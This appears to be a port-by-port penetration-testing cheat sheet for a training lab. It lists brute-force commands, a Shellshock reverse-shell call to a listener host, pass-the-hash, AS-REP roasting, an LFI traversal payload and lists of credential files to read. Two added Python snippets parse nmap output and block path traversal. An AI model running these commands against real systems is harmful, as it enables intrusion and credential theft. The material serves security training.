Ports and Explanations

These are the most common ports found in scans…
The following lists number, use, and effective enumeration tools…

PORTS QUICK REFERENCE (DESKTOP BROWSER)

-----------------------------------------------------------------------------
- FIND AVAILABLE NETWORK CONNECTIONS
nmap -sn -oG results.txt 10.X.X.0/24
-----------------------------------------------------------------------------
21 - FTP
Try anonymous logins
-----------------------------------------------------------------------------
25 - SMTP (EMAIL)
telnet 10.11.1.72 25
VRFY user
FINISH SESSION: Ctl + ] / close
VULN - SHELLSHOCK - need valid email address
python2 postfix-shellshock-nc.py <ip> <email> LHOST LPORT
110 - POP
143 - IMAP
587 - SECURE EMAIL
nc -nv 10.11.1.72 25
nc -nvC 10.11.1.72 110
USER enter-user
PASS enter-pass
-----------------------------------------------------------------------------
80 / 443 - WEB
dirb / dirbuster / gobuster / nikto / curl
RFI / LFI / SQLI
-----------------------------------------------------------------------------
88 / 464 - KERBEROS
pth-winexe -U WORKGROUP/User%Pass //10.11.1.220 cmd.exe
-----------------------------------------------------------------------------
111 - NFS
mounts (showmount -a / -e)
-----------------------------------------------------------------------------
135 - RPC: Remote Procedure Call
impacket-rpcdump
-----------------------------------------------------------------------------
139 / 445 - SMB
(smbmap -H / smbclient -L / nmblookup -A / nbtscan)
nmap --script nbstat.nse <ip>
nmap --script smb-os-discovery <ip>
nmap --script smb-enum-shares -p139,445 <ip>
nmap --script smb-vuln* <ip>
'net' command on kali
crackmapexec smb -u -p
rpcclient -U '' -N
impacket-lookupsid
enum4linux
---------------------------------------------------------------
CIFS                                      - OLD WIN NT 4.0
SMB 1.0 / SMB1                            - WIN2K / WINXP / WIN SRV 2003 / WIN SRV 2003 R2
SMB 2.0 / SMB2                            - WIN VISTA / WIN SRV 2008
SMB 2.1 / SMB2.1                          - WIN 7 / WIN SRV 2008 R2
SMB 3.0 / SMB3                            - WIN 8 / WIN SRV 2012
SMB 3.02 / SMB3                           - WIN 8.1 / WIN SRV 2012 R2
SMB 3.1 / SMB 3.1.1 (SECURE NEGOTIATION)  - WIN SRV 2016 / WIN 10
-----------------------------------------------------------------------------
1433 - MSSQL
nmap --script ms-sql* -p1433
sqsh -S 10.11.1.31 -U sa
-----------------------------------------------------------------------------
389 / 3268 - LDAP (INDICATOR OF DC)
nmap -sT -Pn -n --open <ip> -p389 --script ldap-rootdse
nmap -p 389 --script ldap-search <ip>
dig srv _ldap._tcp.dc._msdcs.<FULL-DOMAIN-NAME> @10.11.1.220
impacket-GetNPUsers thinc/10.11.1.220 -dc-ip 10.11.1.220 -request
-----------------------------------------------------------------------------
3389 - RDP
rdesktop -u <user> -p <pass> <host>
-----------------------------------------------------------------------------
5985 / 5986 - WINRM
evil-winrm -u <user> -p <pass> -i <host>
-----------------------------------------------------------------------------


NMAP QUICK SEARCH

nmap -sn -oG results.txt 10.X.X.0/24
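The sweep above writes grepable (-oG) output to results.txt. The following is an added example, not part of the original page: a small parser for that file format that lists which hosts answered and, when the same file also holds port-scan lines, maps each open TCP port to the section of this reference that covers it. The sample output and the host names in it are constructed.

```python
import re

# Port-to-service map copied from the quick reference on this page.
PORT_SERVICES: dict[int, str] = {
    21: "FTP", 25: "SMTP", 80: "WEB", 88: "KERBEROS", 110: "POP",
    111: "NFS", 135: "RPC", 139: "SMB", 143: "IMAP", 389: "LDAP",
    443: "WEB", 445: "SMB", 464: "KERBEROS", 587: "SECURE EMAIL",
    1433: "MSSQL", 3268: "LDAP", 3389: "RDP", 5985: "WINRM", 5986: "WINRM",
}

# Constructed sample of -oG output: two -sn sweep lines plus one port-scan line.
SAMPLE_OG = (
    "# Nmap 7.94 scan initiated as: nmap -sn -oG results.txt 10.11.1.0/24\n"
    "Host: 10.11.1.72 ()\tStatus: Up\n"
    "Host: 10.11.1.220 (dc01.example.local)\tStatus: Up\n"
    "Host: 10.11.1.220 (dc01.example.local)\tPorts: 88/open/tcp//kerberos-sec///, "
    "389/open/tcp//ldap///, 445/open/tcp//microsoft-ds///, 3389/filtered/tcp//ms-wbt-server///\t"
    "Ignored State: closed (996)\n"
)

HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)")

def parse_grepable(text: str) -> dict[str, dict]:
    """Return {ip: {"hostname": str, "up": bool, "open": [open tcp ports]}}."""
    hosts: dict[str, dict] = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:  # '#' comment lines and anything else
            continue
        ip, name = m.group(1), m.group(2)
        entry = hosts.setdefault(ip, {"hostname": name, "up": False, "open": []})
        # Fields after the host are tab-separated "Key: value" pairs.
        for field in line.split("\t")[1:]:
            key, _, value = field.partition(": ")
            if key == "Status":
                entry["up"] = value.strip() == "Up"
            elif key == "Ports":
                for spec in value.split(","):
                    # Layout: port/state/proto/owner/service/rpc/version/
                    parts = spec.strip().split("/")
                    if len(parts) >= 3 and parts[1] == "open" and parts[2] == "tcp":
                        entry["open"].append(int(parts[0]))
                        entry["up"] = True
    return hosts

def triage(hosts: dict) -> list[str]:
    """Label each open port with the page section that covers it."""
    return [f"{ip}:{port} {PORT_SERVICES.get(port, 'unlisted')}"
            for ip, h in sorted(hosts.items()) for port in sorted(h["open"])]
```

Run it over the real results.txt with parse_grepable(open("results.txt").read()); filtered and closed ports are deliberately left out of the open list.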

FTP
PORT 21

…simply use “anonymous” with no password to start, then enumerate

ftp ip                                   # user: anonymous / pass: <just hit enter>
hydra -L users.txt -P passwords.txt ftp://10.10.1.299
ncrack -U users.txt -P passwords.txt ftp://10.10.1.299
patator ftp_login host=10.10.1.299 user=FILE0 password=FILE1 0=users.txt 1=passwords.txt

EMAIL
PORT 25 – SMTP

telnet ip 25
VRFY user
Ctl + ]                                  # THIS IS TO CLOSE YOUR SESSION

…possible attack vector is SHELLSHOCK

python2 postfix-shellshock-nc.py <ip> <email> LHOST LPORT      # MAY REQUIRE A VALID EMAIL ADDRESS
python2 postfix-shellshock-nc.py 10.10.1.229 [email protected] 192.168.119.229 443

PORT 110 – POP
PORT 143 – IMAP
PORT 587 – SECURE EMAIL

nc -nv 10.11.1.72 25
nc -nvC 10.11.1.72 110
USER enter-user
PASS enter-pass

WEB
PORT 80
PORT 443

…web server ports
…multiple attack vectors

dirb http://10.10.1.299
dirb http://10.10.1.299 -P 10.10.1.299:8080 -o file.txt        # USED TO SCAN OTHER PORTS
dirbuster                                                      # GUI USED TO ENUMERATE
gobuster dir -u http://10.10.1.299:8080 -w /usr/share/wordlists/dirb/big.txt
medusa -h 10.10.1.299 -u admin -P rockyou.txt -M http -m DIR:/admin

REMOTE FILE INCLUSION
LOCAL FILE INCLUSION
SQL INJECTION

# WordPress Enumeration if found
wpscan --url http://10.10.1.299 --passwords /usr/share/wordlists/rockyou.txt --usernames admin
[!] Valid Combinations Found:
 | Username: admin, Password: password

…for LFI, you can look for very common files on a system

https://insecure-website.com/loadImage?filename=..\..\..\windows\win.ini

WINDOWS
C:\windows\win.ini
C:\windows\system.ini
C:\windows\iis.log
C:\windows\System32\Drivers\etc\hosts
C:\Windows\system32\config\SYSTEM
C:\windows\debug\netsetup.log
C:\windows\debug\sammui.log
C:\windows\debug\netlogon.log
C:\windows\debug\passwd.log
C:\windows\system32\winevt\logs\system.evtx
C:\windows\system32\winevt\logs\Windows Powershell.evtx
C:\windows\WindowsUpdate.log
C:\windows\system32\calc.exe
C:\windows\system32\windowspowershell\v1.0\powershell.exe
C:\windows\ccm\logs\filesystemfile.log
C:\users\administrator\appdata\local\recently-used.xbel
C:\users\administrator\desktop\desktop.ini
C:\windows\panther\unattended.xml
C:\windows\panther\unattended\unattended.xml
C:\windows\repair\sam
C:\windows\system32\tasks\daily
C:\windows\panther\sysprep.inf

LINUX
/etc/passwd
/etc/shadow
/etc/crontab
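The loadImage request above only works because the handler joins the filename onto its image directory without checking it. Added here as an example (not from the original page) is the check a developer would put in front of such a handler; IMAGE_ROOT is an assumed location, and the check treats backslashes as separators so the Windows-style traversal shown above is caught on any host.

```python
import os
from pathlib import PurePosixPath

IMAGE_ROOT = "/var/www/images"  # assumed directory the loadImage handler serves from

def is_safe_filename(filename: str) -> bool:
    """True only for a relative name that cannot leave IMAGE_ROOT."""
    # Treat backslashes as separators too: a Windows host does, and the
    # traversal string on this page (..\..\..\windows\win.ini) relies on them.
    norm = filename.replace("\\", "/")
    if not norm or "\x00" in norm:          # empty name or NUL truncation trick
        return False
    p = PurePosixPath(norm)
    if p.is_absolute() or ":" in norm:      # /etc/passwd or C:\windows\...
        return False
    return ".." not in p.parts              # any parent reference is rejected

def resolve_image(filename: str) -> str:
    """Return the absolute path to serve, or raise ValueError."""
    if not is_safe_filename(filename):
        raise ValueError("rejected filename")
    full = os.path.normpath(os.path.join(IMAGE_ROOT, filename.replace("\\", "/")))
    # Second, independent check: the normalised path must still sit under the root.
    if os.path.commonpath([IMAGE_ROOT, full]) != IMAGE_ROOT:
        raise ValueError("path escapes image root")
    return full
```

The check expects the already URL-decoded parameter, which is what a web framework hands the handler; an allow-list of known image names is stricter still where the set of files is fixed.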

KERBEROS – WINDOWS ENVIRONMENTS
PORT 88
PORT 464

…pass the hash is a common vector
…credentials must be known

pth-winexe -U WORKGROUP/User%Pass //10.10.1.299 cmd.exe

NETWORK FILE SYSTEM (NFS)
PORT 111

…you’re looking for shared drives

showmount -a
showmount -e

REMOTE PROCEDURE CALL (RPC)
PORT 135

…can reveal information about a system
…usually shows installed programs / modules

impacket-rpcdump ip

SAMBA (SMB)
PORT 139
PORT 445

…multiple enumeration techniques are available
…different versions will require different attack vectors

nmap --script nbstat.nse <ip>
nmap --script smb-os-discovery <ip>
nmap --script smb-enum-shares -p139,445 <ip>
nmap --script smb-vuln* <ip>
'net' command on kali
crackmapexec smb -u -p
rpcclient -U '' -N
impacket-lookupsid
enum4linux

…it’s important to note Samba versions

CIFS                                      - OLD WIN NT 4.0
SMB 1.0 / SMB1                            - WIN2K / WINXP / WIN SRV 2003 / WIN SRV 2003 R2
SMB 2.0 / SMB2                            - WIN VISTA / WIN SRV 2008
SMB 2.1 / SMB2.1                          - WIN 7 / WIN SRV 2008 R2
SMB 3.0 / SMB3                            - WIN 8 / WIN SRV 2012
SMB 3.02 / SMB3                           - WIN 8.1 / WIN SRV 2012 R2
SMB 3.1 / SMB 3.1.1 (SECURE NEGOTIATION)  - WIN SRV 2016 / WIN 10

MICROSOFT SQL (MSSQL)
PORT 1433

…try to scan and connect
…the ‘sa’ account is usually an admin account

nmap --script ms-sql* -p1433
sqsh -S 10.10.1.299 -U sa

LIGHTWEIGHT DIRECTORY ACCESS PROTOCOL (LDAP)
PORT 389
PORT 3268

…very useful for Active Directory environment enumeration

nmap -sT -Pn -n --open <ip> -p389 --script ldap-rootdse
nmap -p 389 --script ldap-search <ip>
dig srv _ldap._tcp.dc._msdcs.<FULL-DOMAIN-NAME> @10.10.1.299
impacket-GetNPUsers domain/10.10.1.299 -dc-ip 10.10.1.299 -request

REMOTE DESKTOP PROTOCOL (RDP)
PORT 3389

…connection requires credentials

rdesktop -u <user> -p <pass> <host>

WINDOWS REMOTE MANAGEMENT (WINRM)
PORT 5985
PORT 5986

…connection requires credentials

evil-winrm -u <user> -p <pass> -i <host>
